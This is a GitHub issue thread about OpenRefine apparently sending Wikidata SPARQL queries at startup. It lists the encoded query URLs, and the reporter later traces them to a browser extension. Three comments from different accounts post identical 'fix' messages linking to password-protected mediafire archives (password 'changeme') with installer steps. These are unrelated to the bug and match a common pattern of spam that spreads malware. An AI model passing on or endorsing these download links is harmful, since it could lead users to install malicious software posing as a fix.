### ISSUE TITLE
Wikidata pinged on OpenRefine startup

### ISSUE THREAD

**Issue by tfmorris** [OpenRefine/OpenRefine#6815]
When I start OpenRefine, it sends network requests to Wikidata without asking and when I'm not using any Wikidata functionality. It sends 6 SPARQL queries as well as a get languages query to the PHP API

1. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20distinct%20%3Fdomain%20WHERE%20%7B%20%3Fitem%20wdt%3AP4033%20%3Faddress.%20BIND%20(replace(%3Faddress%2C%20%22%5E%40%3F%5B%5E%40%5D%2B%40%22%2C%20%22%22)%20AS%20%3Fdomain)%20%7D%20
2. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20%3Fp%20%3Fs%20%3Fr%20%3Fc%20%3Ft%20WHERE%20%7B%20%3Fstat%20ps%3AP8966%20%3Fs.%20OPTIONAL%20%7B%20%3Fstat%20pq%3AP8967%20%3Fr.%20%7D%20OPTIONAL%20%7B%20%3Fstat%20pq%3AP10999%20%3Ft%20%7D%20%3Fprop%20p%3AP8966%20%3Fstat.%20BIND(IF(EXISTS%7B%3Fprop%20wdt%3AP1552%20wd%3AQ3960579%7D%2C%20%27upper%27%2C%20IF(EXISTS%7B%3Fprop%20wdt%3AP1552%20wd%3AQ65048529%7D%2C%20%27lower%27%2C%20IF(EXISTS%7B%3Fprop%20wdt%3AP1552%20wd%3AQ55121183%7D%2C%20%27insensitive%27%2C%20%27%27)%20)%20)%20AS%20%3Fc)%20BIND(REPLACE(STR(%3Fprop)%2C%20%27http%3A%2F%2Fwww.wikidata.org%2Fentity%2F%27%2C%20%27%27)%20AS%20%3Fp%20).%20FILTER%20(%3Fp%20!%3D%20%27P4033%27)%20MINUS%20%7B%20%3Fprop%20wdt%3AP31%20wd%3AQ18644427.%20%7D%20MINUS%20%7B%20%3Fprop%20wikibase%3ApropertyType%20wikibase%3AGlobeCoordinate.%20%7D%20OPTIONAL%20%7B%20%3Fprop%20wdt%3AP31%20wd%3AQ123667996.%20BIND(1%20as%20%3Fprio)%20%7D%20OPTIONAL%20%7B%20%3Fprop%20wikibase%3ApropertyType%20wikibase%3AUrl.%20BIND(3%20as%20%3Fprio)%20%7D%20BIND(IF(BOUND(%3Fprio)%2C%3Fprio%2C2)%20AS%20%3Fprio).%20%7D%20ORDER%20BY%20%3Fprio%20STRLEN(str(%3Fs))%20 
3. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20DISTINCT%20%3Fp%20WHERE%20%7B%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22%5BAUTO_LANGUAGE%5D%22.%20%7D%20%7B%20SELECT%20DISTINCT%20%3Fprop%20WHERE%20%7B%20%3Fprop%20p%3AP31%20%3Fs0.%20%3Fprop%20wikibase%3ApropertyType%20wikibase%3AUrl.%20%3Fs0%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ84764641.%20MINUS%20%7B%20%3Fprop%20p%3AP31%20%3Fs1.%20%3Fs1%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ19847637.%20%7D%20%7D%20%7D%20BIND(REPLACE(STR(%3Fprop)%2C%20%22http%3A%2F%2Fwww.wikidata.org%2Fentity%2F%22%2C%20%22%22)%20as%20%3Fp)%20%7D%20
4. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20DISTINCT%20%3Fp%20WHERE%20%7B%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22%5BAUTO_LANGUAGE%5D%22.%20%7D%20%7B%20SELECT%20DISTINCT%20%3Fprop%20WHERE%20%7B%20%3Fprop%20p%3AP31%20%3Fs0.%20%3Fprop%20wikibase%3ApropertyType%20wikibase%3AUrl.%20%3Fs0%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ84764641.%20MINUS%20%7B%20%3Fprop%20p%3AP31%20%3Fs1.%20%3Fs1%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ19847637.%20%7D%20%7D%20%7D%20BIND(REPLACE(STR(%3Fprop)%2C%20%22http%3A%2F%2Fwww.wikidata.org%2Fentity%2F%22%2C%20%22%22)%20as%20%3Fp)%20%7D%20 
5. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20%3Fitem%20%3Fproperty%20WHERE%20%7B%20%7B%20%3Fitem%20%3Fpredicate%20%3Chttp%3A%2F%2F127.0.0.1%3A3333%2F%23create-project%3E.%20%7D%20UNION%20%7B%20%3Fitem%20%3Fpredicate%20%3Chttp%3A%2F%2F127.0.0.1%3A3333%2F%23create-project%2F%3E.%20%7D%20UNION%20%7B%20%3Fitem%20%3Fpredicate%20%3Chttps%3A%2F%2F127.0.0.1%3A3333%2F%23create-project%3E.%20%7D%20UNION%20%7B%20%3Fitem%20%3Fpredicate%20%3Chttps%3A%2F%2F127.0.0.1%3A3333%2F%23create-project%2F%3E.%20%7D%20%3Fproperty%20wikibase%3AdirectClaim%20%3Fpredicate.%20FILTER(%3Fproperty%20IN%20(wd%3AP856%2C%20wd%3AP963%2C%20wd%3AP973%2C%20wd%3AP1019%2C%20wd%3AP1065%2C%20wd%3AP1401%2C%20wd%3AP1581%2C%20wd%3AP1896%2C%20wd%3AP2078%2C%20wd%3AP2699%2C%20wd%3AP4238%2C%20wd%3AP4945%2C%20wd%3AP5282%2C%20wd%3AP6269%2C%20wd%3AP6378%2C%20wd%3AP6818%2C%20wd%3AP7014%2C%20wd%3AP7101%2C%20wd%3AP8214%2C%20wd%3AP8768%2C%20wd%3AP8934%2C%20wd%3AP9138%2C%20wd%3AP9214%2C%20wd%3AP9361%2C%20wd%3AP9494%2C%20wd%3AP9601%2C%20wd%3AP9732%2C%20wd%3AP9771%2C%20wd%3AP9904%2C%20wd%3AP10027%2C%20wd%3AP10214%2C%20wd%3AP10225%2C%20wd%3AP10311%2C%20wd%3AP11201%2C%20wd%3AP11212%2C%20wd%3AP11221%2C%20wd%3AP11254%2C%20wd%3AP11266%2C%20wd%3AP11268%2C%20wd%3AP11326%2C%20wd%3AP11556%2C%20wd%3AP11810%2C%20wd%3AP11903%2C%20wd%3AP11904%2C%20wd%3AP12203%2C%20wd%3AP12388%2C%20wd%3AP12634))%20%7D%20LIMIT%201%20 
6. https://query.wikidata.org/sparql?format=json&query=%20SELECT%20DISTINCT%20%3Fp%20WHERE%20%7B%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22%5BAUTO_LANGUAGE%5D%22.%20%7D%20%7B%20SELECT%20DISTINCT%20%3Fprop%20WHERE%20%7B%20%3Fprop%20p%3AP31%20%3Fs0.%20%3Fprop%20wikibase%3ApropertyType%20wikibase%3AUrl.%20%3Fs0%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ84764641.%20MINUS%20%7B%20%3Fprop%20p%3AP31%20%3Fs1.%20%3Fs1%20(ps%3AP31%2F(wdt%3AP279*))%20wd%3AQ19847637.%20%7D%20%7D%20%7D%20BIND(REPLACE(STR(%3Fprop)%2C%20%22http%3A%2F%2Fwww.wikidata.org%2Fentity%2F%22%2C%20%22%22)%20as%20%3Fp)%20%7D%20
7. https://www.wikidata.org/w/api.php?action=query&meta=wbcontentlanguages&wbclcontext=monolingualtext&wbclprop=code%7Cautonym&format=json&origin=*

I'm not sure what all the create-project noise is in request 5, but I double checked and it's actually in the URL.

### To Reproduce

Start OpenRefine

### Current Results
Network requests show above.

### Expected Behavior
No network traffic to anything except the OpenRefine server.

### Versions
 - Operating System: 
 - Browser Version: 
 - JRE or JDK Version: 
 - OpenRefine: 3.8

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wetneb** [comment]
Curious! How are you able to see those requests? I assume they must be done by the backend? At least I can't see anything done by the frontend in the web developer tools of my browser.

**Comment by tfmorris** [comment]
Oops! They're coming from this browser extension that I played around with and forgot to remove:
https://www.wikidata.org/wiki/Wikidata:Tools/Wikidata_for_Web
